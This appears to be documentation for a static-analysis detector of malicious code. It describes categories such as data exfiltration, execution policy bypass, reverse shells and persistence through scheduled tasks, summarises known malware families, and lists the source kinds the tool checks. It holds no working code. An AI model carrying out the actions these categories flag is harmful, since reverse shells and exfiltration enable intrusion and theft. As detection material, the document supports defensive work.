Malicious Command Execution

Data enumeration and Data exfiltration: This is related to malicious software specifically designed to surreptitiously collect and transmit sensitive or confidential data from a compromised system to an external location controlled by attackers. This type of malware poses a serious threat to the confidentiality and integrity of data within an organization.

Execution Policy Bypass: The execution policy isn’t a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally. Thus, malware can easily take advantage of this to be able to execute the malicious code.

External request: This is more generic, but still relevant. Sometimes malicious code performs generic external request from the affected system against the malicious host, just to inform that the infected system is still alive, a kind of ping.

File download: Usually a malware infection involves more than one phase/ malicious set of files. A common situation is to download more malicious scripts/ binaries from malicious host to ensure system persistence or to increase the capacities of the malware.

Reverse shell: This refers to a scenario where malware establishes a reverse shell to provide unauthorized access and control over an infected system to an external attacker. Once they obtain this, the system is totally under their control.

Reverse shell listener: This refers to a scenario where the infected system establishes a connection to a malware host, probably to one that is serving a file, that it’s meant to be executed on the affected system to ensure system persistence or to increase the capacities of the malware.

Scheduled task: This typically involves malicious software creating scheduled tasks on an infected system to execute certain actions at specified times or intervals. This may ensure persistence and availability every time that the system boots.

3CX Supply Chain Attack unfolded in March 2023 as a significant supply chain security breach. The assailants successfully infiltrated applications by incorporating a compromised library file, leading to the subsequent download of an encrypted file housing Command & Control information.

DEADEYE functions as a malware launcher utilized by APT41, and its usage dates back to at least May 2021.

Earth Lusca is an alleged cyber espionage group believed to be based in China, exhibiting activity since at least April 2019.

Lokibot is an extensively disseminated information-stealing tool first identified in 2015. Its primary function involves extracting sensitive data such as usernames, passwords, cryptocurrency wallets, and various credentials. Furthermore, Lokibot can establish a backdoor in compromised systems, enabling attackers to introduce additional payloads.

Remsec serves as a modular backdoor employed by Strider, showcasing indications of being primarily designed for espionage purposes.

StrifeWater operates as a remote-access tool utilized by Moses Staff in the initial stages of their attacks, with a documented presence since at least November 2021.

sources, that indicates the source kinds to check. Available values are:

clipboard_leakage

data_exfiltration

dependency_installation_on_runtime

destructive_action

downloaded_code_execution

file_download

file_execution

reverse_shell

reverse_shell_listener

sensitive_data

system_binary_proxy_execution

sinks, that indicates the sink to check. Available values are:

neutralizations, that indicates the neutralization kinds to check. By default, this is empty. No neutralizers are considered for potential malicious code.

Supply Chain Attack Against 3CXDesktopApp

DEADEYE

Earth Lusca

Lokibot

Remsec

StrifeWater